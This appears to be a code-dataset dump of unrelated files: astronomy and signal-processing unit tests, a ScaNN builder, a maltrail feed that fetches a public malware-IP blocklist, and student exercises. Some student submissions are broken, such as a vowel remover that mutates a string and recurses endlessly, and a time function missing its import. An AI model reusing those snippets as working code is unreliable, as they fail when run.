d4661de7781d69bf47240b7d4a8effe187d22ad9 | dea3e6876afe2fdae5b5b4a3f429cfce81b7a0a1 | /tests/test_frameSetUtils.py | 963a1cbd09e97306839efc9adabd9dc07e8a72a9 | [] | no_license | frossie-shadow/afw | 741f09cd202a5a9cc3b3943696a389b94a4ee404 | a1c44404738dcd73ff400e3bcd176ffe4dd51aab | refs/heads/master | 2021-01-19T17:49:51.003432 | 2017-08-19T03:11:56 | 2017-08-19T03:11:56 | 35,149,129 | 0 | 0 | null | 2015-05-06T08:54:49 | 2015-05-06T08:54:49 | null | UTF-8 | Python | false | false | 3,063 | py | from __future__ import absolute_import, division, print_function
import unittest
from lsst.afw.coord import IcrsCoord
from lsst.afw.geom import arcseconds, degrees, makeCdMatrix, Point2D
from lsst.afw.geom.detail import makeTanWcsMetadata, readFitsWcs, readLsstSkyWcs
import lsst.utils.tests
PrintStrippedNames = False
class FrameSetUtilsTestCase(lsst.utils.tests.TestCase):
"""This is sparse because SkyWcs unit tests test much of this package
"""
def setUp(self):
# arbitrary values
self.crpix = Point2D(100, 100)
self.crval = IcrsCoord(30 * degrees, 45 * degrees)
self.scale = 1.0 * arcseconds
def makeMetadata(self):
"""Return a WCS that is typical for an image
It will contain 32 cards:
- 14 standard WCS cards
- 15 standard cards:
- SIMPLE, BITPIX, NAXIS, NAXIS1, NAXIS2, BZERO, BSCALE
- DATE-OBS, MJD-OBS, TIMESYS
- EXPTIME
- 2 COMMENT cards
- INHERIT
- EXTEND
- LTV1 and LTV2, an IRAF convention LSST uses for image XY0
- 1 nonstandard card
"""
# arbitrary values
orientation = 0 * degrees
flipX = False
metadata = makeTanWcsMetadata(
crpix = self.crpix,
crval = self.crval,
cdMatrix = makeCdMatrix(scale=self.scale, orientation=orientation, flipX=flipX),
)
self.assertEqual(metadata.nameCount(), 14)
metadata.add("SIMPLE", True)
metadata.add("BITPIX", 16)
metadata.add("NAXIS", 2)
metadata.add("NAXIS1", 500)
metadata.add("NAXIS2", 200)
metadata.add("BZERO", 32768)
metadata.add("BSCALE", 1)
metadata.add("TIMESYS", "UTC")
metadata.add("UTC-OBS", "12:04:45.73")
metadata.add("DATE-OBS", "2006-05-20")
metadata.add("EXPTIME", 5.0)
metadata.add("COMMENT", "a comment")
metadata.add("COMMENT", "another comment")
metadata.add("EXTEND", True)
metadata.add("INHERIT", False)
metadata.add("LTV1", 5)
metadata.add("LTV2", -10)
metadata.add("ZOTHER", "non-standard")
return metadata
def testReadFitsWcsStripMetadata(self):
metadata = self.makeMetadata()
self.assertEqual(len(metadata.toList()), 32)
readFitsWcs(metadata, strip=False)
self.assertEqual(len(metadata.toList()), 32)
readFitsWcs(metadata, strip=True)
self.assertEqual(len(metadata.toList()), 18)
def testReadLsstSkyWcsStripMetadata(self):
metadata = self.makeMetadata()
self.assertEqual(len(metadata.toList()), 32)
readLsstSkyWcs(metadata, strip=False)
self.assertEqual(len(metadata.toList()), 32)
readLsstSkyWcs(metadata, strip=True)
self.assertEqual(len(metadata.toList()), 18)
class TestMemory(lsst.utils.tests.MemoryTestCase):
pass
def setup_module(module):
lsst.utils.tests.init()
if __name__ == "__main__":
lsst.utils.tests.init()
unittest.main()
| [
"[email protected]"
] | |
cafd330140fcfb6368723d583251829672ceb42d | a86599993fcca8fbe67ee02106281b5145f8db5e | /Laboratory 04/wdp_ftopt_l04z04pr.py | 37e25e77b5d7c40c7a9717f6d5240df8b50d219e | [] | no_license | pauliwu/Introduction-to-programming-in-python | 2747572c73a5559c0636523f7b75ae6c4e79d51e | cc4be2030d1a0798054ec2c6b30425fd77d3e117 | refs/heads/master | 2022-03-31T09:15:33.191768 | 2020-01-30T22:05:53 | 2020-01-30T22:05:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 429 | py | '''
Napisz program, który poprosi użytkownika o podanie promienia koła, a następnie wyświetli
informację o jego polu i obwodzie.
'''
def kolo(promien):
pi = 3.14
obwod = 2*pi*promien
pole = pi*promien**2
return pole, obwod
def main():
r = float(input("Wprowadz promien kola w cm: "))
p,o = kolo(r)
print("Obwod = ", format(o,".1f"), "cm")
print("Pole = ", format(p,".1f"), "cm^2")
main()
| [
"[email protected]"
] | |
761115aa3bdc406dc4f4c52ccd593a7e80e5d5c2 | c1ad248b8172c63f7756f14cb50f96cf726f90d0 | /tensorflow_examples/lite/model_maker/core/utils/ondevice_scann_builder.py | 9031bc02d9da8875c3b62beb2465f38818ce479a | [
"Apache-2.0"
] | permissive | slmsshk/examples | 846ec816c0c6d095cf49e4054df85a80375f4b7f | cd89a54b9e9577bebd22a9f083526ca8cb2b58b5 | refs/heads/master | 2022-08-16T19:59:03.695027 | 2022-08-07T07:30:14 | 2022-08-07T07:30:14 | 256,999,865 | 1 | 0 | Apache-2.0 | 2020-04-19T12:59:03 | 2020-04-19T12:59:01 | null | UTF-8 | Python | false | false | 1,856 | py | # Copyright 2022 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""ScannBuilder class for on-device applications."""
from google.protobuf import text_format
from scann.proto import scann_pb2
from scann.scann_ops.py import scann_builder
from scann.scann_ops.py import scann_ops_pybind
def builder(db, num_neighbors, distance_measure):
"""pybind analogue of builder() in scann_ops.py for the on-device use case."""
def builder_lambda(db, config, training_threads, **kwargs):
return scann_ops_pybind.create_searcher(db, config, training_threads,
**kwargs)
return OndeviceScannBuilder(
db, num_neighbors, distance_measure).set_builder_lambda(builder_lambda)
class OndeviceScannBuilder(scann_builder.ScannBuilder):
"""ScannBuilder for on-device applications."""
def create_config(self):
"""Creates the config."""
config = super().create_config()
config_proto = scann_pb2.ScannConfig()
text_format.Parse(config, config_proto)
# We don't support residual quantization on device so we need to disable
# use_residual_quantization.
if config_proto.hash.asymmetric_hash.use_residual_quantization:
config_proto.hash.asymmetric_hash.use_residual_quantization = False
return text_format.MessageToString(config_proto)
| [
"[email protected]"
] | |
4a6b78de21ffdffea8c1583ad2df047b3419aa55 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_117/ch73_2019_04_04_18_01_16_761758.py | 2a91c18fcec24852640d02b74224cf472d03ccae | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 266 | py | def remove_vogais(letras):
i=0
while i<len(letras):
if letras[i]== 'a' or letras[i] == 'e' or letras[i] == 'i' or letras[i] == 'o' or letras[i] == 'u':
del letras[i]
else:
i+=1
return remove_vogais(letras)
| [
"[email protected]"
] | |
ba7639ad6a9c59bd8170920acdd5a7a269c096e7 | e5270423abf42482d956548333d4105d684cca31 | /trails/feeds/malc0de.py | 09d204f3da28e20de8dc18f4ac03427f7557e5e3 | [
"MIT"
] | permissive | ana2s007/maltrail | 2f5f556d222b6f1ba78affedce97400da125232a | 80979e76c33dca58313141a0e4a2626b609c3ebf | refs/heads/master | 2021-01-16T22:49:25.319116 | 2016-01-28T13:04:57 | 2016-01-28T13:04:57 | 50,610,789 | 1 | 0 | null | 2016-01-28T20:18:20 | 2016-01-28T20:18:20 | null | UTF-8 | Python | false | false | 689 | py | #!/usr/bin/env python
"""
Copyright (c) 2014-2016 Miroslav Stampar (@stamparm)
See the file 'LICENSE' for copying permission
"""
from core.common import retrieve_content
__url__ = "https://raw.githubusercontent.com/firehol/blocklist-ipsets/master/malc0de.ipset"
__check__ = "malc0de"
__info__ = "malware distribution"
__reference__ = "malc0de.com"
def fetch():
retval = {}
content = retrieve_content(__url__)
if __check__ in content:
for line in content.split('\n'):
line = line.strip()
if not line or line.startswith('#') or '.' not in line:
continue
retval[line] = (__info__, __reference__)
return retval
| [
"[email protected]"
] | |
1a9fa3e8dcf8c60490f47495a2566b6a1f32a92a | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_009/ch90_2019_10_02_18_22_03_037134.py | fcae0603fe15fc773b6d8deebd33737ee6754ef6 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 224 | py | def segundos_entre(x,y):
t1 = datetime.strptime(x, "%H:%M:%S")
t2 = datetime.strptime(y, "%H:%M:%S")
t2 - t1
a = (t2 - t1).seconds
return f'A diferença entre os horários {x} e {y} é: {a} segundos'
| [
"[email protected]"
] | |
871eb6e8ee0778f806cecd0362c54b91bff6028c | d6e90e0326248389768fc9b6aece86b70e16f3e5 | /code_examples/gnuradio/module_fmcw/gr-radar/python/qa_FMCW_separate_IQ_cc.py | 7933b4c9829cbf1f1334c20a93dcfcf5f7cdd61a | [] | no_license | stwunsch/gsoc-proposal | 22d1d8f23b2f6008e59f80c4a51aab50a04b3e85 | 75d37e8a1e6d16ad0798bf3e7b4ab067d24f9a18 | refs/heads/master | 2021-01-19T16:57:41.145819 | 2014-04-14T16:15:08 | 2014-04-14T16:15:08 | 17,761,313 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,891 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2013 <+YOU OR YOUR COMPANY+>.
#
# This is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from gnuradio import gr, gr_unittest,blocks
import radar_swig as radar
class qa_FMCW_separate_IQ_cc (gr_unittest.TestCase):
def setUp (self):
self.tb = gr.top_block ()
def tearDown (self):
self.tb = None
def test_001_t (self):
# set up fg
data = ( complex(1,1),complex(2,2),complex(3,3),complex(4,4),complex(5,5),complex(6,6) )
src = blocks.vector_source_c( data )
test = radar.FMCW_separate_IQ_cc(2)
snk1 = blocks.vector_sink_c(2)
snk2 = blocks.vector_sink_c(2)
snk3 = blocks.vector_sink_c(2)
self.tb.connect(src,test)
self.tb.connect((test,0),snk1)
self.tb.connect((test,1),snk2)
self.tb.connect((test,2),snk3)
self.tb.run ()
# check data
data1 = ( complex(1,1),complex(2,2) )
data2 = ( complex(3,3),complex(4,4) )
data3 = ( complex(5,5),complex(6,6) )
self.assertTupleEqual(data1,snk1.data())
self.assertTupleEqual(data2,snk2.data())
self.assertTupleEqual(data3,snk3.data())
if __name__ == '__main__':
gr_unittest.run(qa_FMCW_separate_IQ_cc, "qa_FMCW_separate_IQ_cc.xml")
| [
"[email protected]"
] | |
e0935743f7688c9951a2d83812994aded07c6dba | ce378bf28153d4d30cd53ec8684e8017abd0ac59 | /pythonProject/leetcode/Rotate Array.py | abac0295ceee22ace5ca239c758306f05baeca4e | [] | no_license | zzong2006/coding-problems-study | 5f006b39264cbe43d11db489ce8b716272329b6e | 9b3affbeb2ddfa673c1d879fb865408e34955c5c | refs/heads/master | 2023-04-07T12:47:41.646054 | 2021-04-08T05:02:33 | 2021-04-08T05:02:33 | 286,918,250 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 696 | py | class Solution(object):
def rotate(self, nums, k):
"""
:type nums: List[int]
:type k: int
:rtype: None Do not return anything, modify nums in-place instead.
"""
print(nums)
n = len(nums)
k %= n
for i in range(n // 2):
nums[i], nums[n - i - 1] = nums[n - i - 1], nums[i]
print(nums)
for i in range(k // 2):
nums[i], nums[k - i - 1] = nums[k - i - 1], nums[i]
print(nums)
for i in range(k, (n + k - 1) // 2 + 1):
nums[i], nums[n - i + k - 1] = nums[n - i + k - 1], nums[i]
print(nums)
a = Solution()
a.rotate([1, 2, 3, 4, 5, 6, 7, 8, 9], k=3)
| [
"[email protected]"
] | |
a2c28ec47fbd74a3159ca3a127c49e89addf2c7d | 7b55cfc4ffa7678e4c7b8f2312831ebbd549e54f | /proj1/tests/other-tests/MINZ_tests/correct/dictionary.py | 3594fcbfb30b0ee6df0cd44083dd7c263c58907c | [] | no_license | czchen1/cs164-projects | 0d330efef85421e611a436b165428ba0ddfb3512 | a04cafbcaafd32e518227dacf89a6d7837bf9f57 | refs/heads/master | 2020-03-27T04:03:31.727524 | 2018-08-23T21:43:46 | 2018-08-23T21:43:46 | 145,909,148 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 97 | py | dict = {'value' : 1, 'abc' : "aba", "ab" : "ababa", "abc" : 2}
print(dict["ab"]) #Expect 'ababa'
| [
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.